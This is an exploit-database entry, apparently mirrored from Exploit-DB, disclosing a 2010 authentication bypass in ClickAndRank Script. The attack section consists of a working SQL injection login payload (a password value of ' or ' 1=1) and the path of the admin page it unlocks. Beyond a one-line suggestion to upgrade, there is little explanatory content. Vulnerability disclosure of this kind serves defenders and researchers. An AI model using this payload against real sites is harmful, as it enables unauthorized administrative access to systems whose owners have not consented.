header-logo
Suggest Exploit
vendor:
ClickAndRank Script
by:
walid
8,8
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: ClickAndRank Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

ClickAndRank Script Authentication Bypass

An authentication bypass vulnerability exists in ClickAndRank Script, which allows an attacker to bypass authentication and gain access to the admin panel.

Mitigation:

Upgrade to the latest version of ClickAndRank Script.
Source

Exploit-DB raw data:

# Exploit Title: ClickAndRank Script Authentication Bypass
# Date: [18/07/2010]
# Author: [walid]
# Software Link: [null]
# Version: [null]
# Tested on: [Windows]
# CVE: [null]

* Found By: WaLiD
* E-mail: Rezultas[at]Gmail[Dot]com
* GreeTZ: [Amine]/[v4-team.com]/[Madjix]
 
---------------------------------------------------------
Vendor: http://www.icash.ch/index.html?ClickAndRank/details.asp
---------------------------------------------------------
 
Exploit Auth Bypass:

login: walid
passw: ' or ' 1=1
 
----------------------------------------------------------
 
-[!]

Demo :
http://<site>/index.html?ClickAndRank/admin.asp
 
----------------------------------------------------------